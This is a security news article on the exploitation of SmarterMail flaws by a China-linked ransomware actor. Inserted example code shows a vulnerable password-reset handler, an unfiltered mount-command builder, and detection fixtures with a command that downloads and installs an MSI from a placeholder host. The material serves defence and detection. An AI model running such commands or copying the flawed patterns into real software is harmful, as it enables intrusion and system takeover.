SecurityBrief New Zealand - Technology news for CISOs & cybersecurity decision-makers

SmarterMail flaw exploited in China-linked ransomware push

Thu, 12th Feb 2026

ReliaQuest reports active exploitation of a vulnerability in SmarterTools SmarterMail email server software that could allow an unauthenticated attacker to reset administrator passwords and take over exposed systems.

With moderate-to-high confidence, ReliaQuest links the activity to Storm-2603, which it describes as a China-based actor associated with Warlock ransomware operations. The firm says it has not previously seen the group use the SmarterMail flaw, tracked as CVE-2026-23760, for initial access.

The findings add to concerns about internet-facing mail infrastructure. Email servers sit on the public web for webmail access and mail transfer services, making them frequent targets for scanning and repeated probing. Defenders often get little warning before exploitation attempts begin.

Account takeover

ReliaQuest's analysis places CVE-2026-23760 in a password reset workflow. Attackers can reset an administrator password through the password reset API because vulnerable SmarterMail builds fail to verify that the old password provided is correct. As a result, incorrect input can be accepted as proof of identity.

This behaviour can give an attacker administrative control of the SmarterMail application without valid credentials. It does not automatically provide code execution on the underlying Windows server, a key step in many ransomware operations.
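To make the defect concrete, here is an added illustration (my own example, not SmarterMail's code; the in-memory store, the PBKDF2 hashing and the function names are hypothetical) of a reset handler that accepts an old password without checking it, beside one that verifies the old password against the stored hash before replacing it:

```python
import hashlib
import hmac
import os

# Constructed in-memory credential store; hypothetical, not SmarterMail's schema.
def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)

def make_store(**accounts: str) -> dict:
    """Build {username: {"salt", "hash"}} from plaintext passwords (setup only)."""
    store = {}
    for username, password in accounts.items():
        salt = os.urandom(16)
        store[username] = {"salt": salt, "hash": _hash_password(password, salt)}
    return store

def verify_password(store: dict, username: str, candidate: str) -> bool:
    record = store.get(username)
    if record is None:
        return False
    # Constant-time comparison so timing does not reveal how many bytes matched.
    return hmac.compare_digest(record["hash"], _hash_password(candidate, record["salt"]))

def _set_password(store: dict, username: str, new_password: str) -> None:
    salt = os.urandom(16)
    store[username] = {"salt": salt, "hash": _hash_password(new_password, salt)}

def reset_password_unverified(store: dict, username: str, old_password: str, new_password: str) -> bool:
    """Defective pattern: the old password is received but never checked, so any
    value the caller supplies is treated as proof of identity."""
    if username not in store:
        return False
    _set_password(store, username, new_password)
    return True

def reset_password_verified(store: dict, username: str, old_password: str, new_password: str) -> bool:
    """Hardened form: the reset proceeds only when the old password verifies."""
    if not verify_password(store, username, old_password):
        return False
    _set_password(store, username, new_password)
    return True
```

The difference is a single guard, which is why the bug is easy to miss in review: both handlers look like they take an old password, but only the verified form ever reads it.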

Feature abuse

ReliaQuest says Storm-2603 chained the authentication bypass with an administrative SmarterMail feature called Volume Mount, which lets administrators specify commands to mount network drives. The firm says the application does not filter the commands entered.

ReliaQuest says the attackers exploited that trust relationship to inject arbitrary commands rather than legitimate mount instructions. Those commands inherit the permissions of the SmarterMail service, potentially giving the attacker administrative control of the Windows operating system hosting the email server.

The sequence matters for defenders because it shows how an application-level takeover can escalate into system-level execution when combined with built-in administrative features. It also reflects a broader ransomware pattern: operators often combine weaknesses with legitimate functions to reduce detection rather than relying on a single exploit.
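As an added illustration of the hardening point (example code of my own, not SmarterMail's Volume Mount implementation; the `net use` invocation, the parameter names and the validation rules are assumptions), here is the unfiltered pattern beside a version that accepts only a drive letter and a plain UNC path and never hands a concatenated string to a shell:

```python
import re
import subprocess

# Hypothetical validation rules; not taken from SmarterMail.
# Drive letter D: through Z:; UNC path \\host\share[\subfolder...] with a
# conservative character set and no whitespace or shell metacharacters.
_DRIVE_RE = re.compile(r"^[D-Zd-z]:$")
_UNC_RE = re.compile(r"^\\\\[A-Za-z0-9.-]{1,253}(\\[A-Za-z0-9_.$-]{1,80})+$")

class InvalidMountRequest(ValueError):
    pass

def build_mount_command_unfiltered(drive: str, unc_path: str) -> str:
    """Defective pattern: administrator input is concatenated into one command
    string that a shell later reparses, so metacharacters in either field
    become additional commands running as the service account."""
    return f"net use {drive} {unc_path} /persistent:no"

def build_mount_argv(drive: str, unc_path: str) -> list:
    """Hardened form: each field is validated against a strict pattern and the
    result is an argument vector, so nothing is ever interpreted by a shell."""
    if not _DRIVE_RE.fullmatch(drive):
        raise InvalidMountRequest("drive must be a single letter D: through Z:")
    if not _UNC_RE.fullmatch(unc_path):
        raise InvalidMountRequest("share must be a plain UNC path such as \\\\host\\share")
    return ["net", "use", drive.upper(), unc_path, "/persistent:no"]

def mount_share(drive: str, unc_path: str, runner=subprocess.run):
    """Execute the validated argv with shell=False. The runner is injectable so
    the function can be exercised without mounting anything."""
    argv = build_mount_argv(drive, unc_path)
    return runner(argv, shell=False, capture_output=True, check=False)
```

Validation before execution matters more than which shell is avoided: a feature that exists to run a mount command should be able to express every legitimate request through a fixed argv with a small, checked set of fields, and anything that does not fit that shape is rejected rather than passed through.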

Persistence tooling

ReliaQuest says that, after gaining code execution, the activity aligned with Storm-2603 tradecraft seen in earlier campaigns. The group installed Velociraptor, a legitimate digital forensics and incident response tool used by security teams, as both a command-and-control mechanism and a persistence method.

ReliaQuest also described a download pattern using Windows Installer. The attackers abused msiexec to pull an MSI payload from Supabase, a legitimate cloud-based backend platform. The firm observed the SmarterMail process MailService.exe spawning a Windows command shell to execute the request.

In earlier Warlock activity, ReliaQuest says the group hosted MSI payloads on GitHub. The move to Supabase suggests an infrastructure change that could bypass existing blocklists and detection rules.
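To show what that chain looks like in process telemetry, here is an added detection example (my own, not ReliaQuest's detection content; the install path, the Supabase project name and the MSI file name in the sample events are constructed placeholders) that walks Sysmon-style process-creation records and flags a command shell spawned by MailService.exe, plus any msiexec install from a remote URL anywhere beneath the mail service:

```python
import re
from dataclasses import dataclass
from typing import Iterator, List, Tuple

@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str

# Constructed sample of process-creation events (Sysmon Event ID 1 style).
# Paths, pids, project name and MSI name are placeholders, not real IoCs.
SAMPLE_EVENTS = [
    ProcessEvent(400, 1, r"C:\SmarterMail\Service\MailService.exe", "MailService.exe"),
    ProcessEvent(512, 400, r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c msiexec /i https://example-project.supabase.co/storage/v1/object/public/pkg/a.msi /qn"),
    ProcessEvent(530, 512, r"C:\Windows\System32\msiexec.exe",
                 "msiexec /i https://example-project.supabase.co/storage/v1/object/public/pkg/a.msi /qn"),
    ProcessEvent(600, 400, r"C:\Windows\System32\conhost.exe", "conhost.exe"),  # benign child
    ProcessEvent(700, 1, r"C:\Windows\System32\cmd.exe", "cmd.exe /c msiexec /i C:\\Temp\\update.msi /qn"),  # local install, unrelated
]

MAIL_SERVICE = "mailservice.exe"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# msiexec with an /i or -i argument whose package is fetched over HTTP(S).
REMOTE_MSI = re.compile(r"\bmsiexec(?:\.exe)?\b.*?\s[/-]i\s+https?://", re.IGNORECASE)

def _basename(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def _ancestors(event: ProcessEvent, by_pid: dict) -> Iterator[ProcessEvent]:
    """Yield parent, grandparent, ... stopping on a missing pid or a cycle."""
    seen = set()
    cur = by_pid.get(event.ppid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        yield cur
        cur = by_pid.get(cur.ppid)

def find_suspicious(events: List[ProcessEvent]) -> List[Tuple[int, str]]:
    """Return sorted (pid, rule) pairs for events matching either rule."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is not None and _basename(parent.image) == MAIL_SERVICE and _basename(e.image) in SHELLS:
            hits.append((e.pid, "shell_spawned_by_mail_service"))
        if REMOTE_MSI.search(e.cmdline) and any(_basename(a.image) == MAIL_SERVICE for a in _ancestors(e, by_pid)):
            hits.append((e.pid, "remote_msi_under_mail_service"))
    return sorted(hits)
```

The second rule deliberately walks the full ancestor chain rather than only the direct parent, because the msiexec process in the described pattern is a grandchild of the mail service (MailService.exe to cmd.exe to msiexec). It also keys on "remote URL in the install argument" rather than on any hosting provider name, so a change of hosting from GitHub to Supabase does not silence it.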

ReliaQuest did not observe a ransomware executable deployed in the incident it investigated. However, it says the tactics, techniques, and procedures matched confirmed Warlock attacks, including the use of MSI installers and Velociraptor for command-and-control. The firm assessed the activity was most likely interrupted during a staging phase.

Second vulnerability

The activity coincides with separate warnings about exploitation of another SmarterMail vulnerability. CISA issued an alert that ransomware actors were exploiting CVE-2026-24423, and ReliaQuest says it saw probes for that flaw alongside the Storm-2603 activity.

ReliaQuest says attempts involving CVE-2026-24423 came from different infrastructure than the activity linked to CVE-2026-23760. That leaves open whether Storm-2603 rotated IP addresses or whether another group used the same window to probe exposed servers.

The overlap suggests defenders may face multiple intrusion paths at once. Internet-facing servers can draw opportunistic scanning while targeted actors pursue their own exploitation chains, complicating incident response and root-cause analysis, especially when logs show multiple API calls tied to different vulnerabilities.

Mitigation steps

ReliaQuest recommends upgrading SmarterMail to Build 9511 or later. It also advises strictly isolating mail servers from internal networks to limit lateral movement. Another measure is outbound traffic control, using firewall rules to restrict external communications to necessary mail protocols and block other outbound connections that could support command-and-control.

ReliaQuest frames patching as necessary but not sufficient when an attacker has already established persistence. Legitimate tooling can allow operators to remain in an environment after a vulnerability is fixed, increasing the need for threat hunting and remediation focused on processes and network activity.
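One way to turn the outbound-control recommendation into a repeatable check is to evaluate a mail server's outbound flow records against an explicit egress policy. The following is an added example of my own, not ReliaQuest's guidance; the allowed port set, the resolver address and the flow-log lines are constructed assumptions to be adjusted for a real environment:

```python
import ipaddress
from typing import List, Tuple

# Hypothetical egress policy for a mail server: mail protocols may leave to any
# destination, DNS only to the organisation's resolvers, everything else is a
# finding. These values are assumptions, not a vendor recommendation.
MAIL_EGRESS = {("tcp", 25), ("tcp", 465), ("tcp", 587), ("tcp", 993), ("tcp", 995)}
RESOLVERS = {ipaddress.ip_address("10.0.0.53")}
DNS = {("udp", 53), ("tcp", 53)}

# Constructed outbound flow records: "timestamp src dst proto dport".
SAMPLE_FLOWS = """\
2026-02-10T03:14:07Z 10.0.5.20 203.0.113.25 tcp 25
2026-02-10T03:14:09Z 10.0.5.20 10.0.0.53 udp 53
2026-02-10T03:15:41Z 10.0.5.20 198.51.100.17 tcp 443
2026-02-10T03:15:42Z 10.0.5.20 198.51.100.17 tcp 443
2026-02-10T03:16:02Z 10.0.5.20 8.8.8.8 udp 53
2026-02-10T03:17:30Z 10.0.5.20 203.0.113.80 tcp 587
"""

def classify_flow(dst: str, proto: str, dport: int) -> str:
    """Map one outbound flow to an allowed/violation verdict under the policy."""
    key = (proto.lower(), dport)
    if key in MAIL_EGRESS:
        return "allowed:mail"
    if key in DNS:
        if ipaddress.ip_address(dst) in RESOLVERS:
            return "allowed:dns"
        return "violation:dns-to-unlisted-resolver"
    return "violation:non-mail-egress"

def find_egress_violations(flow_text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, 'dst:port', verdict) for every violating flow."""
    findings = []
    for lineno, line in enumerate(flow_text.splitlines(), start=1):
        if not line.strip():
            continue
        _ts, _src, dst, proto, dport = line.split()
        verdict = classify_flow(dst, proto, int(dport))
        if verdict.startswith("violation:"):
            findings.append((lineno, f"{dst}:{dport}", verdict))
    return findings
```

Run against the sample, the two HTTPS connections and the DNS query to a public resolver are the findings; the SMTP submissions and the query to the internal resolver pass. The same policy, expressed as deny-by-default firewall rules, is what blocks the command-and-control channel the article describes, and the log check is how you confirm the rules actually hold.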

"Specific attribution matters less than the operational reality: Internet-facing servers are being targeted by multiple vectors simultaneously. Patching one entry point is insufficient if the adversary is actively pivoting to another or, worse, has already established persistence using legitimate tools."

ReliaQuest expects ransomware groups to continue rapidly weaponising vendor fixes and to keep targeting edge systems such as mail servers, VPNs, and file transfer gateways for initial access and follow-on intrusion activity.